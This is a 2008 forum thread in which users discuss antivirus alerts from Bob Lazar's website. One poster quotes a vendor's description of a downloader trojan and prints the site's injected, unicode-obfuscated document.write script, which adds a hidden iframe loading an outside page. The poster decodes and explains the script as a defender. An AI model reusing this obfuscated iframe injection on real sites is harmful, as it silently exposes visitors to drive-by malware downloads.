I just went to Bob Lazar's site and got a virus...

posted on Apr, 9 2008 @ 03:32 AM
I went to his site just to check if the password still didn't work. Well you don't need a password anymore, but my virus scanner started popping up with infected files from the site.

Do you think it's the owners of the site that installed a script or exploit on the site or is it some kind of government spyware or cookie or something tracking people who look into the subject?

posted on Apr, 9 2008 @ 04:24 AM
Hmmm, I'm not game enough to go there to check!
Perhaps one of the techs or IT members here could check it out and post a response?

posted on Apr, 9 2008 @ 04:33 AM

Technical details
This Trojan downloads other programs via the Internet and launches them on the victim machine without the user’s

knowledge or consent. The Trojan is a Java Script script which is built in to HTML pages.
It is 17,002 bytes in size.

Once launched, the Trojan injects its code into the memory of processes which have the following unique identifiers

in the system registry:

The Trojan then attempts to connect to the Internet and download a file called "file.php" from the following


(At the time of writing, this link was not working.)

This file will be saved to the C: \ root directory as "sys%rnd%.exe (%rnd% is a random four digit number):

The downloaded file is then launched for execution.

Removal instructions
If your computer does not have an up-to-date antivirus, or does not have an antivirus solution at all, follow the

instructions below to delete the malicious program:

Delete the original Trojan file (the location will depend on how the program originally penetrated the victim machine).
Delete the following file:
Update your antivirus databases and perform a full scan of the computer

The virus is downloaded once you open this page
http : // www. boblazar. com/ closed/ index. html

I took a look at the source code:

The issue is this one:

< script type ="text/_javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u007 4\u0070\u003a\u002f\u002f\u0074\u006f\u0070\u0031\u0030\u0030\u002d\u0063\u006f\u0075\u006e\u0074\u0065\u0072\u002e\u0063\u006f\ u006d\u002f\u0074\u006f\u0070\u0031\u0030\u0030\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u00 74\u0079\u006c\u0065\u003d\u0022\u0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u003a\u0020\u0068\u0069\u0064\u0064 u0065\u006e\u003b\u0020\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u0020\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0 069\u0066\u0072\u0061\u006d\u0065\u003e\u0020')
< / script >

This is an iframe encoded tag: with the iframe
tag, you can embed a page in another one, even from another website.
But it may happen that a webmaster ( a HECK of a webmaster ) is unaware of it.

Now, changin the "document.write" instruction to "alert" this is the result:

If you click here Google result
then you get this result:

If i'm correct, there are some web page generators which embed automatically the malicious code in the pages that they build.

See also:
Massive Web Server Hacks (”iFrame Attacks”) - Now Extended To TYPO3
I've sent an email to a friend in order to bring the issue to Bob Lazar's attention.
Thanks for sharing this information, diplomat.

[edit on 10/4/2008 by internos]

posted on Apr, 9 2008 @ 04:32 PM
